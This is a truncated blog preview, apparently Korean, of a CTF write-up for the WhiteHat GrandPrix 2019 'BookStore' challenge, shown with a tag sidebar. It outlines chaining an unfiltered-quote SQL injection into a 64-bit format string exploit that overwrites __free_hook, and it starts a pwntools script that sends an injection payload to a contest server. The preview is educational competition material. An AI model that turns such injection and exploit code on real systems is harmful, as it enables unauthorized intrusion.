[pwnpwnpwn-4] WhiteHat GrandPrix 2019 - BookStore
Summary sql injection 64bit Format String Bug Analysis register에서 '를 필터링하지 않아서 sql injection이 가능하다. (login에서는 필터링함.) 그렇게 sql injection을 통해 point를 조건값으로 바꿔주면 fsb가 가능하다. 64bit fsb로 익스하면 됌. Exploit got가 덮으면 안따이길래 __free_hook덮었다. from pwn import * #s = process("bookstore") s = remote("13.124.117.126", 31337) e = ELF("bookstore") s.sendlineafter(": \n", "1") s.sendlineafter(": ", "asdf', '..
pwnable/CTF write-up 2020. 1. 8. 06:13
최근에 올라온 글
최근에 달린 댓글
TAG
- srop
- overflow
- pwnable.tw
- hacking
- glibc
- fastbindup
- fsop
- ebp change
- 해킹
- SQLi
- exit
- tcache
- oob
- pwnable
- codegate
- rt_sigreturn
- heap
- shellcoding
- 본선가고싶다
- TLS
- FSB
- pwable
- HackCTF
- stack reusing
- fastbin
- Total
- Today
- Yesterday